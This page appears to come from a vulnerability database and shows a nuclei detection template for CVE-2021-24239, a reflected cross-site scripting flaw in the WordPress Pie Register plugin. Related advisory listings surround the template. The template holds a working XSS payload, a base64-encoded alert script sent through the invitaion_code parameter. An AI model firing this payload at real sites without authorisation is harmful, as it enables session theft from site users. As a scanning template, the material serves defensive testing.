Lucene search
K

WordPress Pie Register <3.7.0.1 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

WordPress Pie Register plugin <3.7.0.1 - Cross-Site Scripting vulnerability allows injection of arbitrary script, leading to potential cookie theft and other attacks

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 跨站脚本漏洞
22 Apr 202100:00
cnnvd
CNVD
WordPress Cross-Site Scripting Vulnerability (CNVD-2021-44309)
28 Apr 202100:00
cnvd
CVE
CVE-2021-24239
22 Apr 202121:00
cve
Cvelist
CVE-2021-24239 Pie Register < 3.7.0.1 - Reflected Cross-Site Scripting (XSS)
22 Apr 202121:00
cvelist
EUVD
EUVD-2021-11153
7 Oct 202500:30
euvd
NVD
CVE-2021-24239
22 Apr 202121:15
nvd
OSV
CVE-2021-24239
22 Apr 202121:15
osv
Prion
Cross site scripting
22 Apr 202121:15
prion
RedhatCVE
CVE-2021-24239
22 May 202521:04
redhatcve
wpexploit
Pie Register < 3.7.0.1 - Reflected Cross-Site Scripting (XSS)
3 Apr 202100:00
wpexploit
Rows per page
id: CVE-2021-24239

info:
  name: WordPress Pie Register <3.7.0.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim.
  remediation: Fixed in version 3.7.0.1.
  reference:
    - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34
    - https://plugins.trac.wordpress.org/changeset/2507536/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24239
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24239
    cwe-id: CWE-79
    epss-score: 0.01602
    epss-percentile: 0.72837
    cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: genetechsolutions
    product: "pie_register"
    framework: wordpress
  tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Pie Register'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<script>alert(document.domain);</script>") && contains(body, "invitaion-code-table")'
        condition: and
# digest: 4b0a004830460221008c967e62e75bb27d586b5c6405470f6c100fce5228eb689302d1f4598b86f221022100aa69df0f4224ebd1f142a00a1e8ac8fba886d1b255eb243e5dad8a9378985ed9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 24.3
CVSS 3.16.1
EPSS0.01602
32